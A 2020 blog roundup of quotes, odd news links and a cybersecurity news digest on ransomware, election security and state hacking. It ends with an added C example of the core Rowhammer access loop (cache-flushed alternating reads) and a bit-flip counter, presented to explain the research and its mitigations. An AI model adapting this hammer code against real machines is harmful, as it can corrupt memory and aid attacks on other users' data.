Tuesday, January 21, 2020

NEWS YOU CAN USE: The Complete Guide to Avoiding Online Scams


“I don't know how introverts survived without the Internet. Or with the Internet. Actually, I don't know how we survive at all. It feels impossible.”
– Amy Schumer, The Girl with the Lower Back Tattoo


Just when the caterpillar thinks that it is all grown up, it becomes a butterfly 

“The butterfly said to the sun, ‘They can’t stop talking about my transformation. I can only do it once in my lifetime. If only they knew, they can do it at any time and in countless ways.’”
– Dodinsky



From The Washington Post, an illustrated encyclopedia of sleeping positions on a plane. Economy only…we don’t need to see how peacefully the lie-flat fancies in business are slumbering. 






The multi-millionaire son of Exclusive Brethren world leader Bruce D. Hales has been accused of assaulting a man on a public street outside the religious leader's mansion in suburban Sydney.

 


A world without pain (New Yorker)


Putin Enlists Major Cultural Leaders To Rewrite Russian Constitution



Malchkeon, rereading the late Clive James, came across this in his introduction to Cultural Amnesia (2007): “There is too much to appreciate.” Mozart, he notes, never heard all of Bach. “We can hear everything by both of them.” He writes:


“It would be a desirable and enviable existence just to earn a decent wage at a worthwhile job and spend all one’s leisure hours improving one’s aesthetic appreciation. There is so much to appreciate, and it is all available for peanuts. One can plausibly aspire to seeing, hearing and reading everything that matters.” 



Butterfly Kisses

“Aged imperfections
stitched upon my face
years and years of wisdom
earned by His holy grace.
Quiet solitude in a humble home
all the family scattered now
like nomads do they roam.
Then a gift 
sent from above
a memory
pure and tangible
wrapped in innocence and
unquestioning love.
A butterfly kiss
lands gently upon my cheek
from an unseen child
a kiss most sweet.
Heaven grants grace
and tears follow
as youth revisits
this empty hollow.”
― Muse, Enigmatic Evolution









Own your data. Hub Culture is the one global community actively committed to ensuring individual data ownership as it works to build frameworks for digital self-reliance, governance, and collaboration. You can get involved here.


Joseph Savirimuthu, “Book review: Blockchain and the Law: The Rule of Code”, (2019) 16:1 SCRIPTed 95, https://script-ed.org/?p=3748, DOI: 10.2966/scrip.160119.95


Grandson 'inherited' ancestor's WWI head injuries


Why is Japan so successful at returning lost property?


In the dark, it's easy to see through Singapore’s respectable facade

In Singapore, everything has its price. Even people.



Hank Azaria from The Simpsons says he will no longer voice Apu


A voice actor for hit animated series The Simpsons has said he will no longer voice the controversial character of Apu Nahasapeemapetilon, an Indian-born convenience store owner.


Where did the urban legend of the dangerous Australian drop bear come from?


Tricking visitors into believing Australia is home to predatory bears that drop from treetops on to unsuspecting people walking below has become a national pastime, but where did the myth originate?



The Atlantic: “The judging for the eighth annual Ocean Art Underwater Photo Contest, organized by the Underwater Photography Guide, has wrapped up, and the winning images and photographers have been announced. Greg Lecoeur took Best in Show with his image of a crabeater seal in Antarctica. The contest organizers have shared with us some of the winners and honorable mentions below, from the 16 categories of underwater photography. Captions were written by the individual photographers and have been lightly edited for content.”

Gov Info Security
January 3, 2020
Certain federal agencies, especially units within the Department of Defense, still have plenty of work to do when it comes to sharing cybersecurity information and threat intelligence among themselves as well as with the private sector, according to an unclassified report recently sent to Congress. The Office of the Inspector General of the Intelligence Community, which is part of the Office of the Director of National Intelligence, published the audit. While the audit found that substantial progress has been made on sharing cybersecurity information and threat intelligence among agencies over the last two years, it pointed to several areas of ongoing concern, including the failure of certain Defense Department units to use appropriate policies and procedures for data sharing.

Reuters
January 2, 2020
Newly passed legislation will push the U.S. State Department to disclose how it polices the sale of cyber tools and services abroad. The move followed a Reuters investigation which revealed that American intelligence contractors clandestinely assisted a foreign spying operation in the United Arab Emirates, helping the monarchy to crack down on internal dissent. The legislation directs the State Department to report to Congress within 90 days on how it controls the spread of cyber tools and to disclose any action it has taken to punish companies for violating its policies. Under U.S. law, companies selling hacking products or services to foreign governments must first obtain permission from the State Department. U.S. lawmakers and human rights advocates have grown increasingly concerned that hacking skills developed for U.S. spy services are being sold abroad with scant oversight. “Just as we regulate the export of missiles and guns to foreign countries, we need to properly supervise the sale of cyber capabilities,” said congressman Dutch Ruppersberger of Maryland, who drafted the legislation.

The Hill
January 1, 2020
A federal strategy for defending the U.S. government against cyberattacks is one step closer to completion, with lawmakers saying they have a draft form that could be finalized as early as March. The report has been in the works since 2018 after the National Defense Authorization Act created a commission, consisting of lawmakers and industry leaders, to draw up recommendations. Rep. Mike Gallagher (R-Wis.), co-chairman of the commission, told The Hill that the commission had recently put together a draft version. “Over the holiday we will have a few weeks to dig into the draft text, and there are a few issues we are working through, but we feel good,” Gallagher said on Dec. 19. “We had a meeting this week, an additional meeting, and it was a really robust debate, and so I think we’re getting there.” The 2020 National Defense Authorization Act, signed into law by President Trump last month, extended the initial deadline for the commission to produce the report to April 30. Rep. Jim Langevin (D-R.I.), another member of the commission, told The Hill that the commission would likely publish the report before the new deadline. “We will get our work done certainly before then. It could well be as early as March,” Langevin said on Dec. 19. “We are coming to a place where we can see the light at the end of the tunnel.”

Nextgov
December 31, 2019
With just over 10 months to go before Americans head to the polls to elect their next president, states will have access to additional money to help shore up insecure voting equipment. The funding—$425 million—was included in appropriations for the Election Assistance Commission under the 2020 spending bills President Trump signed into law on Dec. 20. EAC Chairwoman Christy McCormick said the commission “will do everything in its power to distribute these funds as expeditiously as possible.” The funding is a boost over Congress’ most recent appropriation of $380 million for election improvements in 2018—the first time since 2010 that Congress made resources available to help states and localities with their election infrastructure and administration. “State and local election officials from across the country regularly tell us about the need for additional resources,” said EAC Vice Chair Benjamin Hovland. “This new funding will allow election officials to continue making investments that strengthen election security and improve election administration in 2020 and beyond.” While election experts welcomed the new funding, they said it may not be sufficient in the face of ongoing threats. Lawrence Norden, director of the Electoral Reform Program at the Brennan Center for Justice, said the funding is “an important and necessary step” to protecting the 2020 elections. However, it “should not be Congress’s only investment in election security.”


ADMINISTRATION

Politico
January 2, 2020
A long-awaited report this week from the Department of Homeland Security found security problems with the computer systems that a North Carolina county used to handle voter data during the 2016 election — but no evidence that Russian hackers had breached them. Still, the review is unlikely to totally resolve questions surrounding the county’s use of software provided by the Florida company VR Systems, which — as POLITICO reported last week — have added to broader doubts about the security of election technology that Americans will use at the polls in 2020. Experts contacted by POLITICO said the new DHS analysis has its share of holes — for instance, failing to examine all the computer systems the Russians could have targeted. And they noted that officials in Durham County, N.C., had waited until about a week after Election Day to preserve some potentially important evidence. “I think [the investigation is] incomplete,” says Jake Williams, a former NSA hacker who is founder of the security firm Rendition Infosec and trains forensic analysts. “It’s the best investigation that can be conducted under the circumstances. We can’t investigate what we don’t have, [and] a lot of the crucial evidence is missing.”

FCW
January 2, 2020
The Department of Homeland Security and the General Services Administration want to know what it would take to develop a cloud-based centralized vulnerability disclosure platform for the federal government. In a request for information released late December, the agencies asked industry for feedback on how to set up a system that could serve as a primary point of entry for security researchers warning about bugs in their internet-accessible systems. While the platform would be managed by the Cybersecurity and Infrastructure Security Agency at DHS, agencies might have to kick in some of their own funding and participation would be voluntary. CISA is looking at a centralized software-as-a-service platform that can track incoming submissions, validate each report for legitimate bugs while filtering out errant ones, enable web-based communication between the reporter and agency during remediation efforts and allow agencies to create separate role-based accounts for their main organization and component agencies.

The Times-Picayune
January 2, 2020
Three weeks after City Hall computer systems were crippled by a cyberattack, New Orleans officials on Thursday offered their first timeline for restoring the systems, saying the city's Police Department and courts should have their access to computer networks restored by Monday. Most of the city's computers have been screened and cleared for use by employees, officials said during a press conference to provide an update on progress. The city's online systems for paying bills and transacting other city business should be available before property tax deadlines at the end of January. "We have made significant progress," Chief Information Officer Kim Walker LaGrue said, adding that her office as well as 75 state and federal partners have been working continuously since the attack to restore the city's networks.

Infosecurity Magazine
January 2, 2020
US maritime facilities have been on high alert over the Christmas break after the Coast Guard revealed details of a ransomware-related outage in late December. The bulletin described a recent attack causing widespread operational disruption at a “Maritime Transportation Security Act (MTSA) regulated facility.” “Forensic analysis is currently ongoing but the virus, identified as ‘Ryuk’ ransomware, may have entered the network of the MTSA facility via an email phishing campaign. Once the embedded malicious link in the email was clicked by an employee, the ransomware allowed for a threat actor to access significant enterprise Information Technology (IT) network files, and encrypt them, preventing the facility’s access to critical files,” it explained. “The virus further burrowed into the industrial control systems that monitor and control cargo transfer and encrypted files critical to process operations. The impacts to the facility included a disruption of the entire corporate IT network (beyond the footprint of the facility), disruption of camera and physical access control systems, and loss of critical process control monitoring systems.” The port facility’s operations were apparently disrupted for over 30 hours as a result of the attack.

CyberScoop
January 2, 2020
The FBI is warning U.S. companies about a series of recent ransomware attacks in which the perpetrator, sometimes posing as a government agency, steals data and then encrypts it to further extort victims. In an advisory to the private sector last week, the FBI called for vigilance to combat the so-called Maze ransomware, which the bureau said began hitting U.S. organizations in November. “From its initial observation, Maze used multiple methods for intrusion, including the creation of malicious look-a-like cryptocurrency sites and malspam campaigns impersonating government agencies and well-known security vendors,” states the advisory obtained by CyberScoop.

Fifth Domain
December 28, 2019
The public comment period on the draft vulnerability disclosure program for federal agencies published by the Department of Homeland Security’s cybersecurity agency has been extended until Jan. 10, 2020. The draft binding operational directive (BOD), one of the few authorities the Cybersecurity and Infrastructure Security Agency has to force entities to take action, would require that federal agencies establish a VDP, in which security researchers could report vulnerabilities in agencies’ public-facing websites. The original comment period was set to expire Dec. 27, but CISA extended the deadline after a “phenomenal response" from stakeholders. So far, CISA has received comments from stakeholders at federal agencies, in industry and at think tanks, concerned with everything from legal protections for researchers submitting vulnerabilities to mandated remediation time frames. Several comments have expressed concern about the resources agencies will ultimately dedicate to the disclosure programs.


INDUSTRY

ZDNet
January 3, 2020
An Arkansas-based telemarketing firm sent home more than 300 employees and told them to find new jobs after IT recovery efforts didn't go according to plan following a ransomware incident that took place at the start of October 2019. Employees of Sherwood-based telemarketing firm The Heritage Company were notified of the decision just days before Christmas, via a letter sent by the company's CEO. Speaking with local media, employees said they had no idea the company had even suffered a ransomware attack, and the layoffs were unexpected, catching many off guard. "Unfortunately, approximately two months ago our Heritage servers were attacked by malicious software that basically 'held us hostage for ransom' and we were forced to pay the crooks to get the 'key' just to get our systems back up and running," wrote Sandra Franecke, the company's CEO, in the letter sent to employees. She goes on to say that data recovery efforts, initially estimated at one week, have not gone according to plan and the company had failed to recover full service by Christmas. Franecke said the company lost "hundreds of thousands of dollars" because of the incident and has been forced to "restructure different areas in the company."

Bleeping Computer
January 2, 2020
The anonymous operators behind the Maze Ransomware are being sued by a victim for illegally accessing their network, stealing data, encrypting computers, and publishing the stolen data after a ransom was not paid. The company suing Maze is Southwire, a leading wire and cable manufacturer from Carrollton, Georgia, which was attacked in December 2019. As part of this attack, the ransomware operators allegedly stole 120GB of data and encrypted 878 devices. After a ransom of 850 bitcoins, or $6 million, was not paid by Southwire, the Maze operators published a portion of the stolen data on a "news" site that the threat actors created. This site is hosted at an ISP in Ireland that Southwire states it contacted repeatedly without receiving a response.

CyberScoop
December 31, 2019
Microsoft has taken hold of 50 websites used by suspected North Korean hackers to bolster attempted hacks against government employees, universities and nuclear organizations, among other targets. The company announced Monday it won a court order allowing it to take over 50 websites that a hacking group Microsoft refers to as Thallium (also known as APT37, or Reaper) has used as part of a campaign to steal sensitive data. Thallium would send phishing emails which directed would-be victims to malicious websites, where they would be prompted to enter their username and password. A successful effort would provide Thallium access to victimized account data including messages, contact lists and appointments. This effort marks the fourth time Microsoft has used U.S. courts to sink nation-state hacking infrastructure. In March, Microsoft said it took over domains used by Phosphorus, an Iranian group also known as Charming Kitten, and in August 2018 said it had moved against Strontium, a Russian group more commonly known as Fancy Bear or APT28. The company also has disrupted a Chinese-linked group it calls Barium.

AP
December 31, 2019
An Alaska air carrier that suffered a cyber attack has experienced more disruption than initially projected, according to a company announcement. The RavnAir Group on Dec. 20 experienced what it called a "malicious" cyber attack on its information technology network, Anchorage television station KTVA reported. The company canceled some Alaska flights of Dash 8 aircraft and said passengers could expect more schedule changes. On Monday, the company announced the disruption was worse than initially reported. Restoration of systems could take up to a month, the company said. Additional flight cancellations and delays are possible for the group's three airlines, RavnAir Alaska, PenAir and RavnAir Connect, the company said.


INTERNATIONAL

The Washington Post
January 3, 2020
Iran’s cyber troops long have been among the world’s most capable and aggressive — disrupting banking, hacking oil companies, even trying to take control of a dam from afar — while typically stopping short of the most crippling possible actions, say experts on the country’s capabilities. But Friday’s American airstrike that killed one of Iran’s top generals, Quds Force Commander Maj. Gen. Qasem Soleimani, now threatens to unleash a fully unshackled Iranian response, analysts and former U.S. officials warned. They said a variety of potential cyber-attacks, possibly in conjunction with more traditional forms of lethal action, would be well within the digital arsenal of a nation that has vowed “severe revenge." “At this point, a cyber-attack should be expected,” said Jon Bateman, a former Defense Intelligence Agency analyst on Iran’s cyber capabilities and now a cybersecurity fellow for the Carnegie Endowment for International Peace.

The Wall Street Journal
December 30, 2019
The hackers seemed to be everywhere. In one of the largest-ever corporate espionage efforts, cyberattackers alleged to be working for China's intelligence services stole volumes of intellectual property, security clearance details and other records from scores of companies over the past several years. They got access to systems with prospecting secrets for mining company Rio Tinto PLC, and sensitive medical research for electronics and health-care giant Philips NV. They came in through cloud service providers, where companies thought their data was safely stored. Once they got in, they could freely and anonymously hop from client to client, and defied investigators' attempts to kick them out for years. Cybersecurity investigators first identified aspects of the hack, called Cloud Hopper by the security researchers who first uncovered it, in 2016, and U.S. prosecutors charged two Chinese nationals for the global operation last December. The two men remain at large. A Wall Street Journal investigation has found that the attack was much bigger than previously known. It goes far beyond the 14 unnamed companies listed in the indictment, stretching across at least a dozen cloud providers, including CGI Group Inc., one of Canada's largest cloud companies; Tieto Oyj, a major Finnish IT services company; and International Business Machines Corp.

Gov Info Security
December 30, 2019
Wanted: A new chief executive to take the helm of Britain's National Cyber Security Centre. On Friday, the NCSC announced that its chief executive, Ciaran Martin, 45, will pursue longstanding plans to step down from his position by the end of summer 2020. A search is underway for his replacement to facilitate a smooth handover before his scheduled leaving date. Martin's upcoming departure serves as a useful moment for reviewing the effectiveness of the NCSC model, which looks to have been highly successful at creating a one-stop shop for private-sector organizations to interface with the government about cybersecurity matters, including investigating major incidents, defending against nation-state attacks and battling election interference. The model is now being emulated in other countries, although the U.S. remains a notable holdout.


TECHNOLOGY

ZDNet
January 2, 2020
In a new research paper published on the last day of 2019, a team of American and German academics has shown that field-programmable gate array (FPGA) cards can be abused to launch better and faster Rowhammer attacks. The new research expands on previous work into an attack vector known as Rowhammer. Rowhammer attacks were first detailed in 2014. The attack exploits a design flaw in the hardware of modern memory cards -- most commonly known as RAM. On modern RAM cards, data is stored inside memory cells, and all memory cells are arranged in a grid pattern. In 2014, academics discovered that by reading data stored on one row of memory cells repeatedly, and at high speeds, they could create an electrical charge that would alter data stored in nearby memory rows. By coordinating repeated read operations, in an operation named "row hammering," they could use the unwanted electrical charges to corrupt RAM data, or manipulate the user's data in malicious ways. After it was disclosed to the public, industry experts deemed the Rowhammer attack only a theoretical threat, but one that had the potential to become a bigger problem later down the line. Just as initially predicted, over the past five years academics have greatly expanded on the initial Rowhammer attack. They found ways around mitigations, they expanded the attack surface to various computer components and configurations, and they even found a way to use Rowhammer to steal data from attacked systems, instead of just altering it. The latest addition to this list is a new Rowhammer attack variation called JackHammer, which allows a malicious party to abuse FPGA cards to launch better and faster Rowhammer attacks.
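For readers who have not seen what "row hammering" looks like from software, the following is an added C example written for this page; it is not code from the ZDNet article or from the JackHammer paper. It shows the two halves of every CPU-side Rowhammer proof of concept: the access loop that alternates reads between two aggressor addresses and flushes them from the cache so each read actually reaches the DRAM row (here with the x86 CLFLUSH instruction, falling back to plain reads on other architectures), and the check run afterwards that counts how many victim bits no longer match the pattern they were written with. The page sizes, fill patterns and iteration count are assumptions chosen so the code runs quickly; because an unprivileged process cannot choose which physical rows its pages land in, the three "adjacent" pages below are almost never truly adjacent rows, so on an ordinary machine this reports zero flips. Real attacks add huge pages or other tricks to control physical placement, which this example deliberately omits.

```c
/* Added example: CPU-side row hammer access pattern plus bit-flip check.
 * Not from the article or the JackHammer paper; sizes and counts are assumptions. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define PAGE_BYTES 4096u
#define VICTIM_PATTERN 0x55u   /* alternating 0101 bits, so any flip is visible */
#define AGGRESSOR_FILL 0xFFu   /* aggressor rows held at all-ones */

/* Evict one cache line so the following read goes to DRAM rather than
 * being served from L1/L2/L3. Without this the "hammering" never touches
 * the memory row and no disturbance can occur. */
static inline void flush_line(volatile const void *p)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p;  /* assumption: non-x86 build keeps the loop shape, no flush */
#endif
}

/* Double-sided hammer: alternate uncached reads between two aggressor
 * addresses. In a real attack these sit in the rows physically above and
 * below the victim row; the reads' only purpose is to activate those rows. */
void hammer(volatile const uint8_t *aggr_a, volatile const uint8_t *aggr_b,
            unsigned long iterations)
{
    for (unsigned long i = 0; i < iterations; i++) {
        (void)*aggr_a;          /* volatile: the reads are not optimised away */
        (void)*aggr_b;
        flush_line(aggr_a);     /* force the next iteration back to DRAM */
        flush_line(aggr_b);
    }
}

/* Count bits in buf that differ from the byte pattern it was filled with.
 * This is the post-hammer check: a non-zero result means the memory
 * changed without anyone writing to it. */
size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t expected)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (size_t)__builtin_popcount((unsigned)(buf[i] ^ expected));
    return flips;
}

/* Lay out aggressor / victim / aggressor as three consecutive pages,
 * fill them, hammer, and return the number of victim bits that flipped.
 * Returns (size_t)-1 if the allocation fails. */
size_t hammer_demo(unsigned long iterations)
{
    uint8_t *region = aligned_alloc(PAGE_BYTES, 3 * PAGE_BYTES);
    if (region == NULL)
        return (size_t)-1;

    uint8_t *aggr_a = region;
    uint8_t *victim = region + PAGE_BYTES;
    uint8_t *aggr_b = region + 2 * PAGE_BYTES;

    memset(aggr_a, AGGRESSOR_FILL, PAGE_BYTES);
    memset(victim, VICTIM_PATTERN, PAGE_BYTES);
    memset(aggr_b, AGGRESSOR_FILL, PAGE_BYTES);

    hammer(aggr_a, aggr_b, iterations);

    size_t flips = count_bit_flips(victim, PAGE_BYTES, VICTIM_PATTERN);
    free(region);
    return flips;
}

int main(void)
{
    size_t flips = hammer_demo(1000000UL);
    if (flips == (size_t)-1) {
        fprintf(stderr, "allocation failed\n");
        return 1;
    }
    printf("victim bit flips after hammering: %zu\n", flips);
    return 0;
}
```

The count_bit_flips routine is the part worth keeping around: researchers sweep many page pairs with hammer, and the flip counter over a known fill pattern (0x55 here, often also 0xAA and 0x00/0xFF to catch both 0-to-1 and 1-to-0 flips) is how candidate victim rows are found. Mitigations such as higher refresh rates, target row refresh and ECC all aim to make that counter stay at zero.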